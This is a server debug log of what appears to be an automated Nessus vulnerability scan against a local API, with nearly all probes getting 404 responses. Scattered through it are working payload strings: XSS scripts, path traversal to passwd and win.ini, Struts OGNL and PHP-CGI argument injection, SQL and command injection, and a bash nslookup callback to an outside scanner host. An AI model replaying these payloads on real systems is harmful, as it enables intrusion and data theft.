GET:/api/item.fts?href=%22%3E%3Cscript%3Ealert(%22ftgate_44002.nasl%22)%3C%2Fscript%3E%3B, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.479Z debug: [1667346041478, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.491Z debug: [1667346041490, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.497Z debug: [1667346041497, duration: 0] GET:/api/login?user=**%3Cscript%3EJavaScript:alert('cpanel_login_user_xss.nasl')%3B%3C%2Fscript%3E, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.500Z debug: [1667346041498, duration: 2] GET:/api/altercast/AlterCast?op=%3cscript%3ealert(%22adobe_document_server_61.nasl%22)%3c%2fscript%3e, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.500Z debug: [1667346041496, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.508Z debug: [1667346041507, duration: 1] GET:/api/nul.dbm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.587Z debug: [1667346041585, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.590Z debug: [1667346041589, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.602Z debug: [1667346041601, duration: 1] GET:/api/index.php/123, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.613Z debug: [1667346041612, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.614Z debug: [1667346041613, duration: 1] GET:/api/mxhelp/cgi-bin/namazucgi?lang=/../../../../../../../../../../../../../boot.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.619Z debug: [1667346041618, duration: 1] GET:/api/index.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.641Z debug: [1667346041639, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.648Z debug: [1667346041646, duration: 2] GET:/api/scripts/w3who.dll, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.662Z debug: [1667346041661, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.669Z debug: [1667346041667, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.672Z debug: [1667346041671, duration: 1] GET:/api/cgi-bin/filescan, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.679Z debug: [1667346041678, duration: 0] GET:/api/enter.php?goto=%2F, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.679Z debug: [1667346041677, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.687Z debug: [1667346041686, duration: 0] GET:/api/Reporting/login/change_password.php?enable_auth=0, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.713Z debug: [1667346041712, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.718Z debug: [1667346041716, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.721Z debug: [1667346041720, duration: 1] GET:/api/struts/webconsole.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.722Z debug: [1667346041720, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.726Z debug: [1667346041725, duration: 0] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.729Z debug: [1667346041729, duration: 0] POST:/api/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.731Z debug: [1667346041730, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.752Z debug: [1667346041750, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.760Z debug: [1667346041759, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.764Z debug: [1667346041763, duration: 0] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.771Z debug: [1667346041768, duration: 2] GET:/api/?class.classLoader.URLs[0]=struts_2_3_16_1_classloader_manipulation-1667346100, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.773Z debug: [1667346041772, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.775Z debug: [1667346041774, duration: 0] GET:/api/$%7B%23w=%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.print('Nessus%20Response:%20'),%23w.println('struts_2_3_14_3_command_execution-1551045197'),%23w.flush(),%23w.close()%7D.action, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.779Z debug: [1667346041779, duration: 0] GET:/api/struts/webconsole.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.827Z debug: [1667346041825, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.829Z debug: [1667346041828, duration: 1] GET:/api/.anydomain.test, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.830Z debug: [1667346041828, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.833Z debug: [1667346041832, duration: 1] GET:/api/sc3/console.php?psid=101, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.838Z debug: [1667346041836, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.859Z debug: [1667346041856, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.869Z debug: [1667346041868, duration: 0] GET:/api/dagent/checkprofile.asp?agentid=11111'plus_agentid_sql_injection.nasl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.873Z debug: [1667346041872, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.877Z debug: [1667346041876, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.881Z debug: [1667346041880, duration: 1] POST:/api/phppath/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.887Z debug: [1667346041886, duration: 1] GET:/api/login_up.php3?login_name=x&passwd=x&locale_id=../../../../../../../../../../../../boot.ini%00.jpg, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.906Z debug: [1667346041905, duration: 1] GET:/api/php/php.exe?c:\winnt\win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.930Z debug: [1667346041929, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.931Z debug: [1667346041931, duration: 0] GET:/api/xsql/demo/airport/airport.xsql?xml-stylesheet=none, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.943Z debug: [1667346041941, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.944Z debug: [1667346041940, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.946Z debug: [1667346041945, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.950Z debug: [1667346041950, duration: 0] GET:/api/OvCgi/freeIPaddrs.ovpl?netnum=127.0.0.1&netmask=255.255.255.0&netid=127.0.0.1%20|%20id|, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.955Z debug: [1667346041954, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.962Z debug: [1667346041962, duration: 0] GET:/api/log.jsp?log=info&mode=asc&lines=10, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.984Z debug: [1667346041983, duration: 1] GET:/api/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.988Z debug: [1667346041986, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.000Z debug: [1667346041999, duration: 0] GET:/api/api/getServices?name[]=$(/bin/bash%20-c%20%22nslookup%20log4shell-generic-hff0AxzTRYBM4BBYL4dMten.w.nessus.org), reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.016Z debug: [1667346042013, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.020Z debug: [1667346042020, duration: 0] GET:/api/1667346100-mongoose_trailing_slash_disclosure.nasl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.054Z debug: [1667346042053, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.057Z debug: [1667346042056, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.060Z debug: [1667346042060, duration: 0] GET:/api/version, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.102Z debug: [1667346042100, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.107Z debug: [1667346042106, duration: 1] GET:/api/search?NS-query-pat=..\..\..\..\..\..\..\..\winnt\win.ini, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.114Z debug: [1667346042113, duration: 1] GET:/api/search?NS-query-pat=../../../../../../../../../etc/passwd, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.132Z debug: [1667346042129, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.141Z debug: [1667346042140, duration: 1] GET:/api/ifx/?LO=../../../../../etc/passwd, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.160Z debug: [1667346042159, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.166Z debug: [1667346042165, duration: 1] GET:/api/status.xsl., reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.174Z debug: [1667346042173, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.180Z debug: [1667346042180, duration: 0] GET:/api/35pD6nFG4mjG, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.193Z debug: [1667346042192, duration: 1] PUT:/api/35pD6nFG4mjG, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.200Z debug: [1667346042199, duration: 1] GET:/api/35pD6nFG4mjG, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.201Z debug: [1667346042199, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.207Z debug: [1667346042207, duration: 0] GET:/api/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.233Z debug: [1667346042232, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.239Z debug: [1667346042238, duration: 1] POST:/api/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.265Z debug: [1667346042264, duration: 1] GET:/api/cgi-bin/faqmanager.cgi?toc=/etc/passwd%00, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.276Z debug: [1667346042275, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.286Z debug: [1667346042285, duration: 0] POST:/api/iControl/iControlPortal.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.307Z debug: [1667346042306, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.317Z debug: [1667346042317, duration: 0] GET:/api/DB4Web/dtm-nessus-dmz02:23/foo, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.322Z debug: [1667346042321, duration: 1] GET:/api/CFIDE/administrator/index.cfm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.338Z debug: [1667346042337, duration: 0] GET:/api/nitro/v1/config/mps, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.345Z debug: [1667346042344, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.353Z debug: [1667346042352, duration: 1] GET:/api/cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=..\..\..\Windows\System32\drivers\etc\&readmeText=1, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.357Z debug: [1667346042356, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.363Z debug: [1667346042363, duration: 0] GET:/api/dev/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.388Z debug: [1667346042387, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.394Z debug: [1667346042393, duration: 0] GET:/api/axis/DirectDownload.jsp, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.401Z debug: [1667346042399, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.406Z debug: [1667346042405, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.408Z debug: [1667346042408, duration: 0] GET:/api/_mt/mt.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.416Z debug: [1667346042415, duration: 1] GET:/api/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.420Z debug: [1667346042419, duration: 0] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.422Z debug: [1667346042422, duration: 0] GET:/api/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.426Z debug: [1667346042425, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:42.428Z debug: [1667346042428, duration: 0] GET:/api/buglist.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.429Z debug: [1667346042429, duration: 0] GET:/api/_mt/mt.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.435Z debug: [1667346042434, duration: 1] GET:/api/cgi/mid.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.436Z debug: [1667346042436, duration: 0] GET:/api/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.440Z debug: [1667346042439, duration: 1] GET:/api/cgi-bin/admin, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.442Z debug: [1667346042442, duration: 0] GET:/api/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.446Z debug: [1667346042445, duration: 0] GET:/api/cgi-bin/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.449Z debug: [1667346042448, duration: 0] GET:/api/buglist.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.452Z debug: [1667346042452, duration: 0] GET:/api/cgi-bin/admin.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.458Z debug: [1667346042456, duration: 0] GET:/api/cgi/mid.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.460Z debug: [1667346042460, duration: 0] GET:/api/cgi-bin/administrator, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.464Z debug: [1667346042463, duration: 1] GET:/api/cgi-bin/admin, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.469Z debug: [1667346042469, duration: 0] GET:/api/cgi-bin/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.470Z debug: [1667346042470, duration: 0] GET:/api/cgi-bin/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.476Z debug: [1667346042476, duration: 0] GET:/api/cgi-bin/agorn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.477Z debug: [1667346042477, duration: 0] GET:/api/cgi-bin/admin.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.484Z debug: [1667346042483, duration: 1] GET:/api/cgi-bin/bugreport.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.485Z debug: [1667346042484, duration: 0] GET:/api/cgi-bin/administrator, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.491Z debug: [1667346042491, duration: 0] GET:/api/cgi-bin/cart.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.492Z debug: [1667346042492, duration: 0] GET:/api/cgi-bin/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.498Z debug: [1667346042497, duration: 0] GET:/api/cgi-bin/clwarn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.498Z debug: [1667346042498, duration: 0] GET:/api/cgi-bin/agorn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.505Z debug: [1667346042504, duration: 1] GET:/api/cgi-bin/count.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.506Z debug: [1667346042505, duration: 0] GET:/api/cgi-bin/bugreport.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.511Z debug: [1667346042510, duration: 0] GET:/api/cgi-bin/Count.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.512Z debug: [1667346042511, duration: 1] GET:/api/cgi-bin/cart.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.518Z debug: [1667346042517, duration: 0] GET:/api/cgi-bin/faqmanager.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.520Z debug: [1667346042518, duration: 0] GET:/api/cgi-bin/clwarn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.524Z debug: [1667346042524, duration: 0] GET:/api/cgi-bin/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.526Z debug: [1667346042525, duration: 0] GET:/api/cgi-bin/count.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.549Z debug: [1667346042548, duration: 0] GET:/api/cgi-bin/Count.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.550Z debug: [1667346042549, duration: 0] GET:/api/cgi-bin/FormMail.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.555Z debug: [1667346042554, duration: 0] GET:/api/cgi-bin/faqmanager.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.556Z debug: [1667346042555, duration: 0] GET:/api/cgi-bin/guestbook.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.560Z debug: [1667346042560, duration: 0] GET:/api/cgi-bin/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.561Z debug: [1667346042561, duration: 0] GET:/api/cgi-bin/help.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.566Z debug: [1667346042566, duration: 0] GET:/api/cgi-bin/FormMail.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.567Z debug: [1667346042567, duration: 0] GET:/api/cgi-bin/hi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.573Z debug: [1667346042572, duration: 1] GET:/api/cgi-bin/guestbook.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.575Z debug: [1667346042574, duration: 1] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.579Z debug: [1667346042578, duration: 1] GET:/api/cgi-bin/help.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.581Z debug: [1667346042581, duration: 0] GET:/api/cgi-bin/index.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.585Z debug: [1667346042584, duration: 0] GET:/api/cgi-bin/hi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.587Z debug: [1667346042586, duration: 0] GET:/api/cgi-bin/index.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.591Z debug: [1667346042591, duration: 0] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.592Z debug: [1667346042592, duration: 0] GET:/api/cgi-bin/login.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.597Z debug: [1667346042596, duration: 1] GET:/api/cgi-bin/index.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.598Z debug: [1667346042597, duration: 1] GET:/api/cgi-bin/mailit.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.603Z debug: [1667346042602, duration: 0] GET:/api/cgi-bin/index.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.603Z debug: [1667346042603, duration: 0] GET:/api/cgi-bin/mt/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.608Z debug: [1667346042608, duration: 0] GET:/api/cgi-bin/login, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.609Z debug: [1667346042609, duration: 0] GET:/api/cgi-bin/mt/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.614Z debug: [1667346042614, duration: 0] GET:/api/cgi-bin/login.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.615Z debug: [1667346042614, duration: 1] GET:/api/cgi-bin/mt-static/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.619Z debug: [1667346042619, duration: 0] GET:/api/cgi-bin/mailit.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.620Z debug: [1667346042620, duration: 0] GET:/api/cgi-bin/mt-static/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.625Z debug: [1667346042624, duration: 1] GET:/api/cgi-bin/mt/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.626Z debug: [1667346042625, duration: 0] GET:/api/cgi-bin/ncbook/book.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.631Z debug: [1667346042630, duration: 1] GET:/api/cgi-bin/mt/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.632Z debug: [1667346042631, duration: 0] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.636Z debug: [1667346042636, duration: 0] GET:/api/cgi-bin/mt-static/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.637Z debug: [1667346042637, duration: 0] GET:/api/cgi-bin/printenv.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.642Z debug: [1667346042642, duration: 0] GET:/api/cgi-bin/mt-static/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.643Z debug: [1667346042643, duration: 0] GET:/api/cgi-bin/quickstore.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.648Z debug: [1667346042648, duration: 0] GET:/api/cgi-bin/ncbook/book.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.649Z debug: [1667346042649, duration: 0] GET:/api/cgi-bin/search, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.655Z debug: [1667346042654, duration: 1] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.656Z debug: [1667346042655, duration: 1] GET:/api/cgi-bin/search.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.661Z debug: [1667346042660, duration: 1] GET:/api/cgi-bin/printenv.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.662Z debug: [1667346042661, duration: 0] GET:/api/cgi-bin/search/search.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.667Z debug: [1667346042666, duration: 1] GET:/api/cgi-bin/quickstore.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.669Z debug: [1667346042667, duration: 0] GET:/api/cgi-bin/status, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.674Z debug: [1667346042674, duration: 0] GET:/api/cgi-bin/search, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.675Z debug: [1667346042675, duration: 0] GET:/api/cgi-bin/status.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.681Z debug: [1667346042680, duration: 0] GET:/api/cgi-bin/search.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.681Z debug: [1667346042681, duration: 0] GET:/api/cgi-bin/test.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.688Z debug: [1667346042687, duration: 0] GET:/api/cgi-bin/search/search.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.689Z debug: [1667346042688, duration: 0] GET:/api/cgi-bin/test.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.695Z debug: [1667346042695, duration: 0] GET:/api/cgi-bin/status, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.696Z debug: [1667346042695, duration: 1] GET:/api/cgi-bin/test-cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.702Z debug: [1667346042701, duration: 1] GET:/api/cgi-bin/status.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.703Z debug: [1667346042702, duration: 1] GET:/api/cgi-bin/upload.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.708Z debug: [1667346042707, duration: 1] GET:/api/cgi-bin/test.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.709Z debug: [1667346042708, duration: 1] GET:/api/cgi-bin/urlcount.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.715Z debug: [1667346042714, duration: 0] GET:/api/cgi-bin/test.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.716Z debug: [1667346042715, duration: 0] GET:/api/cgi-bin/viewcvs.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.720Z debug: [1667346042720, duration: 0] GET:/api/cgi-bin/test-cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.722Z debug: [1667346042721, duration: 0] GET:/api/cgi-bin/wa, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.727Z debug: [1667346042727, duration: 0] GET:/api/cgi-bin/upload.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.729Z debug: [1667346042728, duration: 0] GET:/api/cgi-bin/wa.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.734Z debug: [1667346042733, duration: 1] GET:/api/cgi-bin/urlcount.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.735Z debug: [1667346042734, duration: 1] GET:/api/cgi-bin/wa.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.741Z debug: [1667346042740, duration: 0] GET:/api/cgi-bin/viewcvs.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.744Z debug: [1667346042743, duration: 0] GET:/api/cgi-bin/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.747Z debug: [1667346042747, duration: 0] GET:/api/cgi-bin/wa, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.751Z debug: [1667346042750, duration: 0] GET:/api/cgi-bin-sdb/printenv, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.755Z debug: [1667346042755, duration: 0] GET:/api/cgi-bin/wa.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.759Z debug: [1667346042759, duration: 0] GET:/api/cgi-mod/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.762Z debug: [1667346042762, duration: 0] GET:/api/cgi-bin/wa.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.766Z debug: [1667346042765, duration: 1] GET:/api/cgi-sys/defaultwebpage.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.769Z debug: [1667346042768, duration: 1] GET:/api/cgi-bin/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.771Z debug: [1667346042771, duration: 0] GET:/api/cgi-sys/entropysearch.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.775Z debug: [1667346042774, duration: 1] GET:/api/cgi-bin-sdb/printenv, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.777Z debug: [1667346042776, duration: 0] GET:/api/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.782Z debug: [1667346042781, duration: 1] GET:/api/cgi-mod/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.783Z debug: [1667346042782, duration: 0] GET:/api/index.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.788Z debug: [1667346042787, duration: 0] GET:/api/cgi-sys/defaultwebpage.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.788Z debug: [1667346042788, duration: 0] GET:/api/index.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.794Z debug: [1667346042794, duration: 0] GET:/api/cgi-sys/entropysearch.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.795Z debug: [1667346042795, duration: 0] GET:/api/nph-mr.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:42.801Z debug: [1667346042800, duration: 1] 